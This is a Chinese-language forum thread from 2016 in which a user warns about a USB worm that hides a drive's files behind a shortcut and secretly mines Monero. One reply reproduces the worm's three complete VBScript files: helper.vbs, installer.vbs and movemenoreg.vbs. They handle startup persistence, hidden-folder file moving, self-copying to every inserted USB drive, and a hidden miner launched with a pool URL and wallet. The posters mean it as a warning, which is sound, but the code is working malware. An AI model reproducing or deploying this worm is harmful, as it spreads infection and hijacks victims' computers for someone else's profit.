隨身碟病毒

你有想分享的題目又不知道該放在那一區嗎?這邊歡迎所有議題。
kc305chen
文章: 17
註冊時間: 2014年 3月 19日, 17:40

隨身碟病毒

文章kc305chen » 2016年 7月 1日, 00:22

最近似乎在流行某隻隨身碟病毒(蠕蟲?),被感染的隨身碟內容會變成一個捷徑,點了捷徑才會看到自己原本的檔案,殊不知在點下捷徑的同時,這隻病毒也在你的主機中種下程式~~
說到目前為止似乎和挖礦沒啥關聯,但是仔細研究了一下中毒後產生的vbscript檔,就會發現這隻病毒把你的電腦當成了礦機,在幫人家挖礦,所以提醒各位朋友,自己在挖礦的同時,千萬要小心別也幫別人挖了礦了~~
挖礦的程式碼~"-o stratum+tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8ira5s7cZLS2Yz7KqwRD6ok4bjYp6PWkAiJMKjuQXo3wUh8PJ8JFwE -p x -lowcpu 2 -dbg -1"

頭像
sephirothpan
全域版主
文章: 1535
註冊時間: 2013年 12月 24日, 17:58

Re: 隨身碟病毒

文章sephirothpan » 2016年 7月 2日, 01:11

主程式是?
MINER?
不太可能吧,
有一半的防毒軟體會擋住耶

kc305chen
文章: 17
註冊時間: 2014年 3月 19日, 17:40

Re: 隨身碟病毒

文章kc305chen » 2016年 7月 5日, 20:48

主程式沒留下來,當初沒想太多,就直接刪掉了~
至於防毒軟體,當初我們公司中的時候,防毒軟體沒有叫~
後來我更新了WINDOWS DEFENDER之後,想再打開就顯示有惡意程式碼~
可以上網搜尋一下helper.vbs,有蠻多人回報這隻病毒,但是好像大家都覺得它只是隻病毒,沒注意到裡頭的程式碼~
以下是在某FB社團搜尋到的,供各位參考一下~

代碼: 選擇全部

on error resume next
Dim ws, sParams, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner
Set ws = WScript.CreateObject("WScript.Shell")
sParams = "-o stratum+tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8ira5s7cZLS2Yz7KqwRD6ok4bjYp6PWkAiJMKjuQXo3wUh8PJ8JFwE -p x -lowcpu 2 -dbg -1"

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
startupPath = ws.SpecialFolders("startup")

miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34) & sParams

'ws.Run miner , 0

MyScript = "helper.vbs"

While True
If (not objws.fileexists(startupPath & "\helper.lnk")) then
Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
link.Description = "helper"
link.TargetPath = strPath & "helper.vbs"
link.WorkingDirectory = strPath
link.Save
End If

Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

call procheck(colProcess, "installer.vbs")

Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")

if colProcess.count = 0 then
ws.Run miner, 0
end if
WScript.Sleep 5000
Wend

sub procheck(checkme, procname)

For Each objProcess In checkme
vaprocess = objProcess.CommandLine

if instr(vaprocess, procname) then
Exit sub
End if

Next

ws.Run strPath & procname
end sub
======================分隔=====================
on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"

'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)

'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")

While True

Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
call procheck(colProcess, "helper.vbs")

Set objEvent = colEvents.NextEvent

If objEvent.TargetInstance.DriveType = 2 Then
If objEvent.Path_.Class = "__InstanceCreationEvent" Then
device = objEvent.TargetInstance.DeviceID
devicename = objEvent.TargetInstance.VolumeName
DestFolder = device & "\WindowsServices"
DummyFolder = device & "\" & "_"
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2
end if
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")

if (not objws.fileexists (device & devicename & ".lnk")) then
Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
link.Description = devicename
link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
link.TargetPath = "%COMSPEC%"
link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
'link.WorkingDirectory = device
link.Save
End If


if (not objws.folderexists(DummyFolder)) then
objws.CreateFolder DummyFolder
Set objDestFolder = objws.GetFolder(DummyFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2
End If
set check = objws.getFolder(device)
Call checker(check)

End If
End If


Wend

sub checker (path)
set home = path.Files
For Each file in home
Select Case file.Name
Case devicename & ".lnk"
'nothings
Case Else
objws.MoveFile path & file.Name, DummyFolder & "\"
End Select

Next

set home = path.SubFolders
For Each home in home
Select Case home
Case path & "_"
'nothings
Case path & "WindowsServices"
'nothings
Case path & "System Volume Information"
'nothings'
Case Else
objws. MoveFolder home, DummyFolder & "\"
End Select

Next

end sub

'------------------------------------------------------------

sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)

If not objmove.Attributes AND 2 then
objmove.Attributes = objmove.Attributes + 2
end if
end if
end sub

'------------------------------------------------------------

sub procheck(checkme, procname)

For Each objProcess In checkme
vaprocess = objProcess.CommandLine

if instr(vaprocess, procname) then
Exit sub
End if

Next
ws.Run strFolder & "\" & procname
end sub
===================分隔=======================
on error resume next
Dim strPath, objws, objFile, strFolder, Target, SourceFolder, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
Set ws = WScript.CreateObject("WScript.Shell")

Target = "\WindowsServices"

'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
ws.Run pfolder & "\_"

AppData = ws.ExpandEnvironmentStrings("%AppData%")

DestFolder = AppData & Target
SourceFolder = strFolder

if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2
end if

Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")

sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)

If not objmove.Attributes AND 2 then
objmove.Attributes = objmove.Attributes + 2
end if
end if
end sub

Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")

For Each objProcess In colProcess
vaprocess = objProcess.CommandLine
if instr(vaprocess, "helper.vbs") then
WScript.quit
End if
Next

ws.Run DestFolder & "\helper.vbs"

Set ws = Nothing


回到「閒聊灌水區」

誰在線上

正在瀏覽這個版面的使用者:沒有註冊會員 和 7 位訪客

cron